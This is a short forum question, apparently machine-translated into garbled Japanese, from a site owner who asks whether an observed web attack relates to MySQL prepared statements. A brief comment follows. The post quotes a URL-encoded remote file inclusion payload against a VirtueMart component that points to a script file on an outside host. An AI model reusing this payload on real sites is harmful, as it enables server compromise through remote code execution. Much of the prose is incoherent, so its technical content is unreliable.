に私は最近、自分のサイトへの攻撃を持っていたし、攻撃者が値に次の文字列最近のウェブの攻撃と使用?準備されたMySQLの声明
%2f%2fcomponents%2fcom%5fvirtuemart%2fshow%5fimage%5fin%5fimgtag%2ephp%3fmosConfig%5fabsolute%5fpath%3dhttp%3a%2f%2fwww%2ekwangsung%2ees%2ekr%2f%2fUserFiles%2fshirohige%2fzfxid%2etxt
を追加することによって、私のSQL文のいずれかを変更しようとしました。
はとにかく、私はPHPを使用するか、これがために起こったものは何でも、しかし、%3F%3Fしていない問題の原因となった?:MySQLではステートメントコール、Sダブルハングを準備します。
誰もがこの問題に直面していましたか?私はMySQLサイトをチェックして何も見つけられませんでした。
この例では、URIエンコードされた「?文字列は2つではなく、どのような文字列を含んでいますか? – pilcrow